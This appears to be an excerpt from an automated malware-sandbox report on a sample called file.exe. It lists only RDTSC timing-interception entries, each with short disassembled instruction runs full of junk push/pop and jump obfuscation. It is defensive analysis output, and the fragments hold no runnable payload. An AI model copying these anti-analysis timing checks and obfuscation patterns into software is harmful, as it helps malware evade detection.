                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A8733 second address: 2A8773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD7ED12076Bh 0x0000000e jnp 00007FD7ED12076Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jng 00007FD7ED120768h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 jmp 00007FD7ED12076Ch 0x00000027 pop edi 0x00000028 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A8773 second address: 2A877D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD7ECCCADE6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A877D second address: 2A8787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AB99D second address: 2AB9A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AFF91 second address: 2AFFA1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7ED120772h 0x00000008 jne 00007FD7ED120766h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B025D second address: 2B0277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0277 second address: 2B027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B027D second address: 2B0281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0281 second address: 2B02A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FD7ED120766h 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FD7ED120766h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B02A0 second address: 2B02A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B02A4 second address: 2B02AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B02AC second address: 2B02B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0444 second address: 2B044E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD7ED120766h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B044E second address: 2B0452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0452 second address: 2B0460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FD7ED12076Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B073C second address: 2B0742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0742 second address: 2B0746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0746 second address: 2B074A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B074A second address: 2B0770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD7ED120777h 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A56 second address: 2B0A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADF6h 0x00000008 jp 00007FD7ECCCADE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0CD6 second address: 2B0CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0CDA second address: 2B0D0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD7ECCCADF4h 0x0000000e jg 00007FD7ECCCAE01h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0D0B second address: 2B0D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED120775h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jmp 00007FD7ED12076Eh 0x00000012 pop esi 0x00000013 jmp 00007FD7ED12076Fh 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0D46 second address: 2B0D59 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD7ECCCADEEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7B0A second address: 2B7B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120774h 0x00000007 jo 00007FD7ED120772h 0x0000000d jne 00007FD7ED120766h 0x00000013 jc 00007FD7ED120766h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7B3C second address: 2B7B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD7ECCCADF0h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7CF9 second address: 2B7D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ED120772h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jl 00007FD7ED120766h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7D1B second address: 2B7D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7D21 second address: 2B7D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BA4BB second address: 2BA4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD7ECCCADE6h 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BA01D second address: 2BA027 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BA027 second address: 2BA02F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BA19F second address: 2BA1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BA1A5 second address: 2BA1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF00C second address: 2BF012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2322B0 second address: 2322B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2322B6 second address: 2322D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007FD7ED120772h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BE5B7 second address: 2BE5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BE5BB second address: 2BE5DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD7ED12076Bh 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2322C5 second address: 2322CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2322CB second address: 2322D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BE749 second address: 2BE756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FD7ECCCADE8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BE9F7 second address: 2BE9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BEB4E second address: 2BEB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BEB54 second address: 2BEB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD7ED120779h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C19A0 second address: 2C19A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C5FF8 second address: 2C6001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6001 second address: 2C6005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6286 second address: 2C62A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007FD7ED120766h 0x00000009 jmp 00007FD7ED12076Fh 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007FD7ED120766h 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C62A9 second address: 2C62AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6431 second address: 2C6435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6435 second address: 2C648F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FD7ECCCADF2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD7ECCCADF3h 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007FD7ECCCAE0Dh 0x00000018 jmp 00007FD7ECCCADF8h 0x0000001d jmp 00007FD7ECCCADEFh 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C648F second address: 2C6499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FD7ED120766h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A03E second address: 26A047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A047 second address: 26A04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C68D0 second address: 2C68DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD7ECCCADE6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C68DA second address: 2C68E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C68E2 second address: 2C68EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C68EA second address: 2C68EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C68EE second address: 2C68F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6A5D second address: 2C6A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6A63 second address: 2C6A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6A6E second address: 2C6A74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6A74 second address: 2C6A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD7ECCCADEEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D035C second address: 2D0381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007FD7ED120780h 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D0381 second address: 2D0386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D0386 second address: 2D0399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 je 00007FD7ED120766h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D0399 second address: 2D039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D039D second address: 2D03B9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop edx 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D03B9 second address: 2D03D8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7ECCCADF3h 0x00000008 jmp 00007FD7ECCCADEDh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007FD7ECCCADE6h 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE44E second address: 2CE48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FD7ED12076Fh 0x0000000e jmp 00007FD7ED12076Bh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD7ED120777h 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF82E second address: 2CF834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF834 second address: 2CF838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF838 second address: 2CF83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D49EE second address: 2D49F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D49F2 second address: 2D49F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D87F2 second address: 2D87FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2215F6 second address: 221600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 221600 second address: 22160B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD7ED120766h 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22160B second address: 22161B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADECh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22161B second address: 22161F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D81DF second address: 2D81E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D81E5 second address: 2D81FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED120771h 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D81FB second address: 2D8216 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007FD7ECCCADE6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jo 00007FD7ECCCADE8h 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D8216 second address: 2D821C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D84C9 second address: 2D84F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD7ECCCADEDh 0x0000000d pop esi 0x0000000e push ecx 0x0000000f jne 00007FD7ECCCADECh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D84F0 second address: 2D84F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DE33D second address: 2DE343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DE343 second address: 2DE35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED120772h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DE35E second address: 2DE362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DE362 second address: 2DE366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DEA21 second address: 2DEA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DEC9C second address: 2DECDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FD7ED120773h 0x00000014 jmp 00007FD7ED12076Ch 0x00000019 popad 0x0000001a jnl 00007FD7ED120772h 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DF117 second address: 2DF134 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7ECCCADE6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007FD7ECCCADECh 0x00000015 pop ecx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DF134 second address: 2DF13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DF13A second address: 2DF13E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFF6A second address: 2DFF7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E7263 second address: 2E7267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E7267 second address: 2E7270 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E7270 second address: 2E7276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
